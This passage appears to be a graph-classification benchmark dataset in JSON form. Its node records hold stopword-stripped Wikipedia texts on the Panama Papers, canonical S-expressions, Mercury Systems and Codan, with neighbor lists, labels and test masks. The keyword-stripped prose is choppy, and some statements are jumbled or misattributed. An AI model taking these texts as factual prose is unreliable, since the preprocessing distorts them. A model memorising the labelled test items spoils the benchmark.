investments categorized tax evasion fines 100 omitted tax payment result well three months nine years imprisonment according forbes hinojosa prominent mexicans mostly businessmen close ties government including least one member forbes billionaires list subject extensive articles published online icij investigation partners proceso aristegui noticias sunday proceso also said mexicans mentioned leaked documents included individuals linked drug cartels ken emrith member opposition united national congress unc linked bribery scandal brazil panamanian shell companies used transfer millions us dollars offshore bank accounts brazilian construction company awarded contract 2011 national infrastructure development company nidco people partnership administration build highway trinidad tt 5.2 billion highway 49 complete estimated highway cost tt 8 billion done investigators found emirth companies received 6 million nidco emirth also director pembury consultants trinidad tobago limited oas hired highway project consultant 44,800 month may 2013 oas paid pembury least tt 896,000 totals beyond date currently available emrith described low-level unc party official second mossack fonseca company pendrey associates speaking parliament attorney general faris al-rawi said leaked documents tied offshore company key players petrobras scandal brazil including convicted jose luiz pires queluz dealings swiss ag pires investigation said according icij investigative partner trinidad express emrith close associate jack warner also owns half shares proteus holding sa investment refuses discuss says responsibility confidentiality fellow shareholders express also says oas used namibian port development project camouflage 1 million payment procopio shell company santa tereza services ltd emirth president barack obama critical caribbean tax havens 2008 election campaign 2010 united states implemented foreign account tax compliance act law required financial firms around world report accounts held us citizens internal revenue service us hand refused sign common reporting standard set organisation economic co-operation development alongside vanuatu bahrain means us receives tax asset information american assets income abroad share information happens united states countries words means united states become attractive tax least 2,400 us-based clients found papers many transactions legal mossack fonseca offered advice many us clients evade us tax financial disclosure laws panama free trade agreement supported obama clinton accused enabling practices detailed within panama papers regulatory oversight however obama administration official said argument zero merit john cassidy new yorker said panama free trade agreement actually forced panama release information american regulatory authorities ownership companies partnerships trusts foundations persons citing leaked diplomatic cables fortune writer chris matthews speculated obama clinton may supported agreement opposing campaigning office quid pro quo panamanian support us efforts drug trafficking event notes true agreement abolished limits fund transfers us panama obama administration insisted two countries first sign tax information exchange agreement well facilitated exchange tax information countries president barack obama addressed overseas shell companies listed leak press conference 're breaking laws said laws poorly designed allow people 've got enough lawyers enough accountants wiggle responsibilities ordinary citizens abide although leader us mentioned panama papers obama said frankly folks america taking advantage stuff senators sherrod brown elizabeth warren requested treasury department investigate us-linked companies appeared leaks addition justice department given role financial markets former secretary state 2016 democratic presidential candidate hillary clinton condemned outrageous tax havens loopholes ... panama elsewhere pennsylvania afl–cio event clinton added behavior clearly law everyone violates law anywhere held accountable scandalous much actually legal clinton promised going scams make sure everyone pays fair share america manhattan us attorney preet bharara opened criminal investigation matters related panama papers sent letter april 3 international consortium investigative journalists icij saying office would greatly appreciate opportunity speak soon possible icij received many requests many countries icij director gerard ryle said policy turn materials new york department financial services asked 13 foreign banks including deutsche bank ag credit suisse group ag commerzbank ag abn amro group nv societe generale sa information dealings mossack fonseca banks accused wrongdoing must provide telephone logs records transactions new york branches law firm mcclatchy newspapers initially found four americans offshore shell companies named documents previously either accused convicted financial crimes fraud tax evasion three reasons suggested explain scarcity americans leak asked paucity american individuals documents digital editor süddeutsche zeitung stefan plöchinger said via twitter wait coming next plöchinger later clarified advocating jumping conclusions copies least 200 american passports – indicating owners applied banking services – discovered papers us politicians yet named leak names americans however mentioned former south african president thabo mbeki head african union panel illicit financial flows april 9 called leak welcome called african nations investigate citizens nations appear papers panel 2015 report found africa loses 50 billion year due tax evasion illicit practices 50-year losses top trillion dollars furthermore said seychelles african nation fourth mentioned tax documents minister industry mines abdeslam bouchouareb sole owner panamanian-registered offshore company known royal arrival corp since 2015 company active turkey great britain algeria managed compagnie d'etude et de conseil cec based luxembourg account swiss nbad private bank cec confirmed ownership royal arrival said managed minister inherited assets transparency algeria estimates lost 16 billion dollars offshore 2004 2014 cause concern given drop price oil accounts 95 algeria external revenue panama papers exposed link american oil company oil concessions several powerful politicians angola according leaked documents approximately fifteen shell companies funneled money ubs bank accounts elites portugal direct ties helder bataglia dos santos escom describes one largest investors angola democratic republic congo account one company markwell inc received sent 12 million 2008 2009 petroleum minister josé maria botelho de vasconcelos power attorney offshore company 2002 became petroleum minister previously employed number years executive sonangol according leaked documents denies wrongdoing icij partner le monde says seen documents show proxyholder medea investments limited founded niue 2001 moved samoa five years later company issued bearer bonds capitalization 1 million closed 2009 never previously accused corruption angola 5 billion sovereign wealth fund fundo soberano de angola fsdea promotes vehicle development prosperity angola fsdea headed josé filomeno de sousa zenu dos santos son president josé eduardo dos santos power since 1979 funded state-owned petroleum company sonangol fsdea critics say record-keeping murky seems engage nepotism cronyism ian kirby head court appeal owns seven holding companies british virgin islands said intended investment lost money 2015 congo produced 290,000 barrels oil day philia attorney denied receiving advantageous pricing said received 2.5 coraf oil denis christel sassou-nguesso son denis sassou nguesso power 32 years re-elected march disputed election daniel representative oyo member ruling parti congolais du travail congolese party labour also assistant director-general société nationale des pétroles du congo snpc general manager national refinery coraf according leaked documents mossack fonseca establish shell company british virgin islands named phoenix best finance ltd. name also appears 2002 director geneva-based philia sa alongside oil merchant jean-philippe amvame ndong denied knowledge matters according swiss non-profit berne declaration philia exclusive no-bid contract congolese oil exports coraf refinery last three years country received payment oil shipped refinery bruno itoua president advisor oil director-general snpc 2005 us federal court found diverted funds fictitious companies nonetheless became minister energy panama papers documents seen le monde reveal also held power attorney since 2004 denvest capital strategies grafin associated sa registered mossack fonseca panama british virgin islands itoua currently minister scientific research 1999 2002 kabila regime transferred ownership least 5 billion assets state-mining sector private companies control ... compensation benefit state treasury united nations investigation found us dodd-frank act supposed help bring end conflict diamonds minerals us idea public opinion would force divestment time section 1502 require divestment mandate disclosure instead disclosure requirement simply meant new business opportunities money launderers recently 2014 un found 70 percent drc gold sold dubai without problem gold continued provide important funding army armed rebel groups march 2005 dan gertler international formed new company global enterprises corporate gec global resources owned beny steinmetz former drc mines minister simon tuma-waku special adviser company formed joint copper cobalt mining venture drc agency la générale des carriers et des mines gécamines held 25 gec 75 placed isle man holding company nikanor plc ipo raised £400 million london company eventually reached market capitalization 1.5 billion initial investment 3 million steinmetz appears 282 leaked documents gertler dan gertler inc ties joseph kabila closest aide 200 presidential decree ratified agreement issued despite recommendation anti-corruption lutundula commission according panama papers kabila twin sister owns part offshore company interests congo include part mobile-phone company vodacom congo government called press conference warn journalists printing names congolese figures might appear documents kabila sister jaynet désirée kabila kyungu feruzi kalume nyembwe advisor late father former president laurent-désiré kabila directors keratsu holding limited company registered niue mossack fonseca months elder kabila assassination keratsu held 19.6 shares congolese wireless network held 49 vodacom congo lucien ebata kinshasa businessman runs orion group sa registered seychelles 2009 mossack fonseca luxembourg-based figed according panama papers ebata receives salary million dollars business volume around billion counts shell société nationale des pétroles du congo snpc among customers theory american european buyers gold africa required review supply chain report use conflict resources gold eastern congo practice requirement widely ignored investigation african network centers investigative reporting ancir found examples leaked mossack fonseca documents anonymous shell companies sourcing start drc gold winds dubai way uganda dubai 75 billion gold industry regulated light hand quasi-private dubai multi commodities centre dmcc kalotti exports 40 dubai gold bought 5.2 billion gold 2012 little paperwork according ernst young partner amjad rihan rijan said dmcc employer squashed concerns dmcc changed audit procedures ensure favorable outcome future ancir journalists obtained records showing kalotti sold scrap gold refiners including valcambi leaked documents show pamp holding mauritius signed agreement mks holding bv two shell companies described beneficial owners panama-based mountside investment hong kong-based dynamic bonus limited 2010 mks holdings owned 72 joint venture mmtc ltd. owned state india switzerland pamp joint venture supply big multinationals like apple alaa mubarak son former president hosni mubarak cited owning holding companies real estate properties london assets virgin islands-registered firm pan world investments frozen response european union order father stepped 2011 arab spring mossack fonseca fined 37,500 2013 lack due diligence alaa brother convicted last year embezzling state funds still face trial insider trading egyptian businessmen mohamed abu el-enein ahmed bahgat ashraf marwan ibrahim kamal mohamed nosseir mohamed mansour raouf ghabbour mohamed al-maghraby named leaked documents well orascom development holding company headed samih sawiris also bank alexandria banque misr banque du caire former sudanese president ahmed al-mirghani client mossack fonseca also al-mirghani lived egypt 1989 coup ended presidency active democratic unionist party orange star corporation bought long-term lease tony london neighborhood near hyde park 600,000 year al-mirghani created time death held assets worth 2.72 million every ramadan fed 500 people financed 20 pilgrimages mecca every year described billionaire seydou kane holds diplomatic passports senegal gabon mali protocol officer senegalese embassy paris waiting plane landed roissy-charles-de-gaulle november 2015 kane close associate gabonese ruling family questioned jailed nanterre ten hours anti-corruption agents connection investigation opened july 2007 january 2013 kane briefly questioned transit miami le bourget french authorities whose curiosity piqued €2.5 million cash person according senegalese daily libération money-laundering unit tracfin became interested 2006 €300,000 payment groupe marck french company specializing military uniforms anti-riot gear monaco-based entity called citp citp managed kane close friend president chief staff maixent accrombessi held paris interrogated august 2015 french officials wanted ask accrombessi contract marck gabonese ministry interior €7 million head marck philippe belin also held questioned investigation assigned also conducted so-called ill-gotten goods investigation targeted number african leaders including father predecessor ali bongo ondimba current president gabon mossack fonseca opened two holding companies kane 2013 2014 maxi gold international limited smart key ltd according paperwork traded sundries one hand gym equipment john addo kufuor son john agyekum kufuor mossack fonseca manage trust starting 2001 father took office trust held 75,000 bank account panama mother also beneficiary linked two offshore companies also registered father term inactive kojo annan son former secretary-general united nations kofi annan appears laolu saraki son late nigerian senator abubakar olusola saraki shareholders blue diamond holding management corp registered mossack fonseca british virgin islands 2002 two directors sutton energy ltd also registered british virgin islands 2002 transferred samoa 2015 annan used another shell company first registered british virgin islands transferred samoa purchase apartment london 500,000 2008–2009 beny steinmetz group resources bsgr owner beny steinmetz paid 165 million mining rights northern portion simandou mine located nzérékoré region guinea interior soon sold 51 percent rights vale 2.5 billion rio tinto previously held concession invested 450 million infrastructure site global witness says bsgr fact paid nothing rights 165 million represents bsgr self-reported investment improvements site adds either way bsgr profit exceeded national budget guinea us authorities say steinmetz paid mamadie touré 5.3 million help obtaining concession husband lansana conté president guinea shortly died according global witness offshore company belonging touré matinda received payment 2.4 million company named pentler holdings several payments promised well 5 bsgr shares simandou pentler owned 17.65 bsgr guinea guinean president alpha condé launched investigation elected 2010 separately us federal bureau investigation fbi us justice department suspecting violations foreign corrupt practices act august 2014 mossack fonseca received tax information exchange agreement tiea notice us government inquiring ownership pentler two bsgr companies administered mossack fonseca geneva office however president pentler financial management firm menachem eitan fugitive us sec facing charges 55 million ponzi scheme guinea mines minister mohamed lamine fofana said 2012 bsgr n't follow law jean-claude n'da ametchi advisor former president laurent gbagbo refused accept lost election 2010 also mentioned leaked documents european union sanctioned banker n'da ametchi 2011 helping finance gbagbo regime offshore company cadley house ltd registered seychelles bearer bonds bank account morocco n'da ametchi sent email 2011 geneva office mossack fonseca naming geneva bank pasche financial managers company september 2012 acted sole director request transfer registration abidjan neither mossack fonseca banks mentioned european sanctions eventually lifted 2012 company apparently still active 2015 according documents seen le monde currently advisor former prime minister charles konan banny lost october 2015 presidential election former deputy chief justice kalpana rawal director shareholder four holding companies active two took office husband owns another seven companies used real estate transactions britain rawal husband shareholders directors highworth management services ajay shah former director trust bank also shareholder director central bank kenya ordered shah assets auctioned repay depositors trust bank collapsed went hiding assets recovered mounir majidi personal secretary king mohammed vi designated march 2006 representative smcd limited created 2005 geneva financial advisor dextima conseils according icij smcd majidi bought aquarius w 1930s-era luxury sailboat registered morocco el boughaz belonging king smcd according icij also made loan luxembourg company logimed investissements co sarl details available following loan smcd liquidated 2013 diamond ocean enterprises mossack fonseca entity set 2005 reported purpose financial consulting namibian diamond manufacturer polisher according law firm records deutsche investment consultants asia limited mossack fonseca company set british virgin islands now-imprisoned mafioso vito palazzolo wolf-peter berthold german banker based hong kong director firm shareholders include peter von palace kolbatschenko palazzolo son berthold giovanni agusta also 2005 zacharias zacky nujoma youngest son sam nujoma set two holding companies avila investments marbella investments licensed buy cut diamonds shortly afterwards 90 stock transferred diamond ocean 2006 nujoma established ancash investments obtained seven exclusive uranium prospecting licenses palazzolo loaned company us 10 million canadian mining company announced would partner ancash uranium contracts said based decision part ancash strong international support natural earth international ltd. hong kong natural earth another deutsche investment company corrupt officials stolen 150 billion nigeria last 10 years said nigerian president muhammadu buhari said april 7 2016 added planned ask united states president barack obama help president nigerian senate bukola saraki found panama papers leak ties least four offshore companies failed declare code conduct bureau nigerian law requires wife toyin also shell companies listed name mossack fonseca documents girol properties ltd sandon development limited *landfield international developments ltd. saraki said assets holding companies belong wife family therefore required report ancir dismisses however leaked documents link firm handwritten note suggests mossack fonseca aware nominee director aliko dangote chief executive dangote group tied leaked documents four offshore companies many 13 family business associates included dangote estimated 17 billion worth currently involved construction 14 billion oil refinery lagos former delta state governor james ibori also mentioned leak ibori pleaded guilty london 2012 siphoning 75 million nigeria office 1999–2007 charges nigeria dropped nigeria following election ibori sentenced 13 years mossack fonseca registered agent four offshore entities received request 2008 information accounts british crown prosecutors family julex foundation shareholder stanhope investments company incorporated 2003 island niue funneled millions dollars could buy private jet united kingdom returned £6.8 million nigeria funds seized accounts determined belonged ibori anti-corruption taskforce olusegun obasanjo government economic financial crimes commission questioned time whether yar'adua administration refrained loath pursue members nigerian elite suspected corruption including leading financiers ruling party like ibori supported election former senate president david mark also listed owner eight shell companies leaked panama papers sikera overseas s.a. colsan enterprises limited goldwin transworld limited hartland estates limited marlin holdings limited medley holdings limited quetta properties limited centenary holdings limited portion wealth owned former chairman united bank africa uba hakeem belo-osagie domiciled trusts shell companies notorious tax havens around world government rwanda uses offshore company lease private jet senior politicians leaked documents show brigadier-general emmanuel ndahiro using london address become director british virgin islands company debden investments ltd. 1998 owner jet aircraft ndahiro close advisor president paul kagame spokesman kagame military according panama papers owner company hatari sekoko ran number real estate hotel ventures marriott kigali icij partner ouestaf.com able establish panama papers existence secret contracts dp world fze dp mamadou pouye bribery codefendant karim wade son former prime minister abdoulaye wade information available trial ouestaf confirmed financial ties corporation first time panama papers investigation wade sentenced 2015 six-year prison term cour de répression de l'enrichissement illicite crei specialized anti-corruption court wade accused illegally amassing assets 240 million childhood friend pouye sentenced five years allegedly helping denied wrongdoing united nations amnesty international said rights violated trial ouestaf investigation address legality trial conclude succeeded tracing payment pouye oversea shell company subsidiary dp wade remains member senegalese democratic party pds still pds candidate 2017 presidential election mossack fonseca documents show pouye owned three offshore companies seabury inc regory invest latvae inc. seabury seems set solely business dp world started 2008 year senegal signed contract dp world rights container terminal autonomous port dakar april 2009 wade became minister international cooperation territorial development air transport infrastructure remained father defeat macky sall 2012 election regory invest acted seabury subcontractor receiving €65,000 euros month according documents according ouestaf documents make clear crei investigators interested funds pouye monaco account know source offshore account created two contracts prove fact relationship defendants dp world investigator papa alboury ndao told court february discovered two payments 13 million subsidiary dp world fze singapore bank account belonging karim wade however bank singapore refused cooperate ndao forced drop line inquiry mossack fonseca opened several offshore companies multinationals example anglogold owner anglogold investments senegal ltd et anglogold exploration senegal ltd based british virgin islands senegalese architect pierre atepa goudiaby special advisor former president abdoulaye wade also mentioned leaked documents swiss law firm fidinam sa mossack fonseca open offshore atepa engineering corp en 2006 year goudiaby opened paris office champs-elysées icij investigation traces many levels offshore holdings multiple countries related business dealings beny steinmetz many serious findings request mossack fonseca backdate revocation power attorney mossack fonseca records show sierra leone diamond exporter octea based british virgin islands steinmetz family beneficiaries wholly owned guernsey-based bsgr resources linked bribery scandal guinea foundations switzerland liechtenstein among nysco balda bsgr 2007 one nysco bank accounts contained 27.7 million steinmetz personal fortune 6 billion supplies diamonds tiffany debeers sierra leone largest private investor yet according detailed report namibian octea subsidiary owes among debts property taxes 700,000 city koidu unpaid taxes discounted according mayor saa emerson lamina octea promised 5 profit−sharing agreement payment 1 annual profit community development fund either octea subsidiary koidu holdings obtained mine 28 million supposed deposit 2002 fighting stopped sierra leone mine previously held worked south african firm branch energy payment services parent company executive outcomes effectively ... military battalion hire rebel fighters area steinmetz since put 300 million project according reporting african network centers investigative reporting ancir company produces 60–90 sierra leone diamond exports months 2012 2015 exported us 330 million rough diamonds octea owes us 150 million unpaid loans although government records show taxes paid diamond companies none listed octea national mineral agency nma 2005 valued diamonds export using price book based 1996 figures companies also often seek minimize value diamond exports reduce taxes move profits abroad transferred subsidiary elsewhere value taxed diamonds frequently worth diamonds koidu average 330 carat roughly 50 de beers jwaneng mine botswana world biggest tiffany first pick best stones mined koidu remainder sold trade buyers according bloomberg according world bank sierra leone long time based growth forecasts success two companies one octea parent bsgr two men linked fidentia south african asset management company looted 1.2 billion rand pension funds meant provide 46,000 widows orphans mineworkers accounts mossack fonseca willing help hide money even south africa made names public former chief executive fidentia j. arthur brown sentenced 2014 concurrent 15-year sentences fbi arrested one man steven goodwin los angeles 2008 sent back south africa goodwin sentenced 10 years prison fraud money laundering graham maddock also later jailed south africa fraud khulubuse zuma nephew south african president jacob zuma links documents offshore company oil interests democratic republic congo denied wrongdoing according leaked documents president zuma also ties oil mining deal british virgin islands-based oil company caprikat limited joseph kabila president democratic republic congo drc helped caprikat obtain oil fields drc sent nephew drc run firm former president ahmed al-mirghani surfaced client mossack fonseca al-mirghani president 1986 1989 created orange star corporation british virgin islands panama firm 1995 living egypt coup ended presidency active democratic unionist party orange star corporation bought long-term lease tony london neighborhood near hyde park 600,000 year al-mirghani created time death held assets worth 2.72 million trial court prosecutor tunis ordered judicial inquiry panama papers tunisian political figures suspected hiring firm judge tunisian court specializing financial crimes assigned case tunisian assembly representatives people established parliamentary commission inquiry well newspaper inkyfada access documents reported dozen politicians former government officials lawyers implicated well leading media figure monday april 4 2016 reported former secretary-general nidaa tounes political party mohsen marzouk also coordinator new political party machrouu tounes point creating account december 2014 first presidential elections marzouk written mossack fonseca company virgin islands emphasizing desire hold funds conduct business overseas marzouk denies filed defamation complaint inkyfada forced briefly shut website following report due cyberattack attempted insert names politicians mentioned leaked documents mossack fonseca documents provide new insight confirmation previously-litigated tax case offshore company transferred registration avoid paying capital gains tax uganda documents show heritage oil gas limited hogl knew advance capital gains tax uganda planned enact hogl operating uganda planned sell half ugandan assets urgently moved registration bahamas mauritius avoid tax mauritius double taxation agreement uganda meaning hogl would pay tax one two countries mauritius capital gains tax moving heritage reduced capital gains tax zero emails clearly show reason transfer although company attorneys deny 2010 hogl sold 50 percent stake ugandan oil fields tullow uganda us 1.5 billion uganda revenue authority ura applied us 404 million capital gains tax transaction hogl refused pay four-year battle various courts ensued ugandan officials including president yoweri museveni then-ura commissioner-general allen kagina demanded payment tullow threatening renew exploration licenses expire unless deducted tax payment heritage remitted ura eventually tullow made payment deposited rest escrow pending legal resolution appeal came 2013 tullow also successfully sued hogl recover taxes paid behalf heritage gas oil subsidiary heritage oil founded conservative party donor tony buckingham given party £100,000 december 31 2008 still owned 33.1 heritage oil uganda ratio tax gross domestic product less 14 one lowest east africa arms dealer mining tycoon close links president robert mugabe operated offshore companies despite us european sanctions 2013 four years sanctions announced according leaked documents according panama papers zimplats holdings large platinum mining concern set shell company pay salaries senior managers zimplats denies knowledge company hr consultancy company still active 2015 unknown reserve bank zimbabwe may indicate externalization funds tax evasion appears salaries citizens zimbabwe performing work zimbabwe april 22 2016 australia said would create public register showing beneficial actual owners shell companies part effort stamp tax avoidance multinational corporations australian taxation office announced investigating 800 individual australian taxpayers mossack fonseca list clients cases may referred country serious financial crime task force eighty names match organized crime intelligence database leaked documents examined abc pierced veil anonymous shell companies linked sydney businessman brisbane geologist mining deals north korea rather applying sanctions australian government asx seem allowed coach horses ridden people involved forming relationship corporate relationship one primary arms manufacturers north korea said thomas clark university technology sydney david sutton director aat corporation ehg corporation held mineral licenses north korea business korean natural resources development investment corporation united nations sanctions north korea primary arms dealer main exporter goods equipment related ballistic missiles conventional weapons responsible approximately half arms exported north korea geologist louis schurmann said british billionaire kevin leech key putting deal together leaked documents also reveal involvement another briton gibraltar-based john lister according abc department foreign affairs trade aware mining deals also brought australian senate nobody ever referred matter australian federal police may 12 2016 names former prime minister australia malcolm turnbull former premier new south wales neville wran found panama papers due pair former directorship mossack fonseca-incorporated company star technology systems limited turnbull wran resigned positions 1995 prime minister denied impropriety stating star technology made profits—which regrettably—it certainly would paid tax australia media initially reported panama papers lists 500 entities created jurisdiction cook islands population 10,000 almost many singapore whose population 5.7 million winebox affair cook islands gave new zealand jurisdiction tax matters new zealand inland revenue department said working obtain details people tax residence country may involved arrangements facilitated mossack fonseca gerard ryle director international consortium investigative journalists told radio new zealand april 8 2016 new zealand well-known tax nice front criminals new zealand provides overseas investors foreign trusts look-through companies new zealand government policy request disclosure identity either settlor beneficiaries trust thus ownership remains secret consequence thus hiding assets trust-holder home jurisdictions trusts taxed new zealand trusts used acquire new zealand registered companies become vehicle trust owners exercise day day control assets new zealand-registered companies designed make profit using loans tax havens profit shifting techniques result tax free income general respectability typically associated companies registered new zealand prime minister john key responded may 7 john doe remark curiously quiet tax evasion cook islands saying whistleblower confused probably european cook islands use new zealand currency much responsibility tax cook islands taxing russia new zealand represent cook islands defence foreign policy taxation said distancing new zealand cook islands key ignored close ties two countries crucial role new zealand setting cook island taxation system mossack fonseca approached niue 1996 offered help set tax tiny south sea island law firm drafted necessary legislation permitting offshore companies operate total secrecy took care paperwork island got modest fee filing seemed like quite deal even required law provide banking paperwork russian chinese well english soon filings almost covered island year budget us government however made official noises 2001 laundering criminal proceeds chase bank blacklisted island bank new york followed suit caused inconvenience population let contract mossack fonseca expire many privacy-seekers banking world moved stay however apparently panama papers database lists nearly 10,000 companies trusts set niue population 1200 many recently created shell companies set samoa perhaps niue revised tax laws panama papers database lists 13,000 companies trusts set samoa population roughly 200,000 may 27 2015 us department justice indicted number companies individuals conspiracy corruption racketeering connection bribes kickbacks paid obtain media marketing rights fifa tournaments immediately entered guilty pleas among indicted jeffrey webb jack warner current former presidents concacaf continental confederation fifa headquartered united states charged racketeering bribery offenses others us south american sports marketing executives paid agreed pay well 150 million bribes kickbacks december 12 2014 josé hawilla owner founder traffic group brazilian sports marketing conglomerate waived indictment pleaded guilty four-count information charging racketeering conspiracy wire fraud conspiracy money laundering conspiracy obstruction justice hawilla also agreed forfeit 151 million 25 million paid time plea torneos traffic subsidiary fox international channels since 2005 investments since 2002 company involved corrupt practices acquisition rights major south american soccer tournaments many individuals mentioned panama papers connected world governing body association football fifa including former president conmebol eugenio figueredo former president uefa michel platini former secretary general fifa jérôme valcke argentine player barcelona lionel messi italy head manager metro antonio guglielmi leak also revealed extensive conflict interest member fifa ethics committee former fifa vice president eugenio figueredo swiss police searched offices uefa european football governing body naming former secretary-general gianni infantino president fifa signed television deal uefa company called cross trading fbi since accused bribery contract emerged among leaked documents infantino denied wrongdoing april 2019 icij european newspapers reported global tally payments exceeded one billion usd 1.2 billion comparison great britain recovered largest position 253 million followed denmark 237 million germany 183 million spain 164 million france 136 million australia 93 million colombia 89 million recuperated highest amount south central american countries heavily involved financial scandal investigations ongoing austria canada switzerland payments expected many countries conducting continued inspections companies private individuals revealed report",
    "neighbors": [
      865,
      3522,
      899,
      1251,
      5636,
      5857,
      3495,
      6410,
      2451,
      7893,
      8408,
      8574
    ],
    "mask": "None"
  },
  {
    "node_id": 10868,
    "label": 9,
    "text": "Canonical_S-expressions:canonical s-expressions canonical s-expression csexp binary encoding form subset general s-expression sexp designed use spki retain power s-expressions ensure canonical form applications digital signatures achieving compactness binary form maximizing speed parsing particular subset general s-expressions applicable composed atoms byte strings parentheses used delimit lists sub-lists s-expressions fully recursive s-expressions typically encoded text spaces delimiting atoms quotation marks used surround atoms contain spaces using canonical encoding atom encoded length-prefixed byte string whitespace separating adjacent elements list permitted length atom expressed ascii decimal number followed sexp becomes csexp note quotation marks required escape space character internal atom canonical s-expression length prefix clearly points end atom note also whitespace separating atom next element list csexps generally permit empty lists empty atoms forth certain uses csexps impose additional restrictions example csexps used spki one limitation compared csexps general every list must start atom therefore empty lists typically list first atom treated one treats element name xml encodings common use generally csexp parser one two decimal orders magnitude smaller either xml asn.1 small size corresponding speed give csexp main advantage addition parsing advantage differences csexp xml differ csexp data-representation format xml includes data-representation format also schema mechanism thus xml configured particular kinds data conform grammar say html atom svg mathml new ones needed languages defining document grammars dtd defined xml standard xsd relaxng schematron commonly used xml additional features xml also work schema csexp data course operated schemas implemented higher level provides mechanism terms characters bytes csexp string may byte sequence whatsoever length prefix atom xml like regular scheme s-expressions json literals programming languages requires alternate representations characters control characters however effect range structures semantics represented xml also provides mechanisms specify given byte sequence intended interpreted say unicode utf-8 string jpeg file integer csexp leaves distinctions external mechanisms basic level csexp xml represent trees external representations surprising since xml described differently-punctuated form lisp-like s-expressions vice versa however xml includes additional semantics commonly achieved csexp various conventions rather part language first every xml element name csexp applications commonly use first child expression second xml provide datatyping firstly via schema grammar schema also however distinguish integers strings data objects types e.g jpeg especially xsd types xml element may also attributes construct csexp share represent xml data csexp one must choose representation attributes obvious one reserve second item s-expression list name value pairs analogous lisp association list xml id idref attributes equivalent csexp easily implemented csexp application program finally xml element may contain comments and/or processing instructions csexp specific equivalents trivial represent merely reserving name example naming *com *pi prevents ever colliding xml element type names csexp xml fully recursive first atom csexp list convention roughly corresponds xml element type name identifying type list however csexp atom encoding e.g. jpeg unicode string wav file … xml element names identifiers constrained certain characters like programming-language identifiers csexp method obviously general hand identifying encoding item thus interpret determined particular user conventions meaning csexp application must build conventions code documentation forth similarly csexp atoms binary consisting length prefix followed totally arbitrary bytes xml designed human-readable arguably less json yaml arbitrary bytes xml must encoded somehow example bitmapped image included using base64 means storing large amounts non-readable information uncompressed xml takes space hand survive translation alternate character sets including transmission network hosts may apply differing character sets line-end conventions etc. suggested xml merges sequence strings within one element single string csexp allows sequence atoms within list atoms remain separate one another incorrect exactly like s-expressions csexp xml notion sequence strings strings separated somehow asn.1 popular binary encoding form however expresses syntax data types semantics two different structures sequence two integers identical representations wire barring special tag choices distinguish parse asn.1 structure one must tell parser set structures one expecting parser must match data type parsed structure options adds complexity asn.1 parser csexp structure carries indication semantics encoded element names parser csexp structure care structure parsed wire-format expression parsed internal tree form similar xml dom consumer structure examine conformance expected noted xml document without schema works like csexp respect xml document work like asn.1",
    "neighbors": [
      7805,
      6502,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 10869,
    "label": 3,
    "text": "Mercury_Systems:mercury systems mercury systems inc. high-tech commercial company serving aerospace defense industries headquartered andover massachusetts processing subsystems used intelligence surveillance reconnaissance isr radar electronic warfare ew storage guidance defense applications mercury based andover massachusetts 1000 employees offices around world annual revenues approximately us 493 million fiscal year ended june 30 2018 meet department defense dod defense electronics procurement reform objectives mercury created next generation business model defense procurement reform objectives captured department ’ better buying power 3.0 bbp3.0 overarching theme “ achieving dominant capabilities technical excellence innovation. ” mercury systematic approach creation defense processing subsystems using sensor processing chain methodology define reusable building blocks business approach leverages best commercial technology making mercury processing building blocks interoperable standardized defense processing subsystems quickly developed open system architectures osa fundamental meeting dod ’ bbp 3.0 objectives aligned mercury ’ business posture company pioneered many today ’ embedded protocols processing standards including rapidio openvpx ansi/vita 65 standard de facto embedded digital processing standard currently company investing openrfm radio frequency rf microwave processing bring interoperability rf/microwave domain openvpx digital realm openrfm standardizes profiles interfaces protocols rf microwave processing enabling sensor chain applications fully open systems compliant mercury applies open systems architectures software well hardware approach applied middleware preserves software application investments adding new capabilities tech-refreshes mercury headquartered andover massachusetts facility incorporates design engineering capability innovation center mercury innovation centers showcase company ’ sensor mission processing solutions mercury redundant scalable advanced microelectronic centers amcs amcs production defense industry subsystems amcs operated new england new york metro-area southern california trusted dmea facility southwest mercury three major product lines br • advanced microelectronic rf digital br • sensor mission processing mercury mission systems safety-critical avionics mission processing networking communication secure high-performance sensor processing storage networking br • mercury defense systems – electronic warfare secure processing test simulation mercury ’ businesses supported several dedicated international operations including toronto canada silchester united kingdom tokyo japan geneva switzerland",
    "neighbors": [
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 10870,
    "label": 3,
    "text": "Codan:codan codan limited manufacturer supplier communications metal detection mining technology headquartered adelaide south australia revenue 132.3 million 2014 2017 revenue 226.1 million codan limited communications business unit parent company codan group engaged business operating segment radio communications product range sold customers 150 countries addition global service support network codan group regional sales offices washington d.c. usa victoria bc canada chicago il usa farnham uk beijing china dubai united arab emirates company maintains quality assurance systems approved standard company established 1959 three friends university adelaide alastair wood ian wall jim bettison company established electronics instrument lighting company limited eilco renaming codan 1970 codan listed australian stock exchange 2003 expanded military technology 2006 2005 ceo mike heard denied codan knowingling supplied technology al-quaeda operative 2001 mike heard acted company ceo 1990s held position retirement 2010 2009 codan established military security division usa 30 june 2012 codan limited sold satellite communications assets cpi international holding corp wholly owned subsidiary cpi international inc cpi 2016 codan defence electronics established leverage core competencies military radio countermine technology codan designs manufactures range hf equipment including transceivers base portable mobile modems power supplies amplifiers antennas accessories also provides hf solutions ranging basic voice communication data email fax chat gps tracking interoperability according fed mil standards codan hf transceivers initially developed provide communications people living working travelling central australia codan supplier hf radio products aid humanitarian markets since 1980 markets include public private security sectors well significant recreational vehicle user market australia codan military hf radio transceivers comply mil-std-188-141b ale jitc certified fed-std-1045 ale interoperable military grade radios provide frequency hopping voice encryption codan supplier us army provided around 3000 transceivers support security rebuilding programs afghanistan iraq 13 september 2011 dsei industry conference codan announced branding change hf radio division renaming division radio communications reflect broader focus company integrated radio communications systems 11 june 2012 eurosatory international defence security tradeshow codan radio communications announced launch codan envoy – software-defined radio enables users add new capabilities radio software updates 7 august 2012 codan announced acquisition daniels electronics limited daniels leading designer manufacturer supplier land mobile radio communications lmr solutions north america since launched tactical solutions stratus p25/lte hivenet p25 transportable repeaters secure mobile voice operations minelab specialises advanced electronic technologies including detection equipment military humanitarian de-mining projects also produce metal detectors consumer market company manufacturing distribution customer service operations adelaide australia cork ireland naperville usa iso 9001:2000 quality endorsed company minelab established 1985 acquired codan march 2008 minetec established technology service partner mining industry company provides integrated safety productivity communications solutions surface underground mining operations including advanced tracking mine operations management collision avoidance systems",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 10871,
    "label": 2,
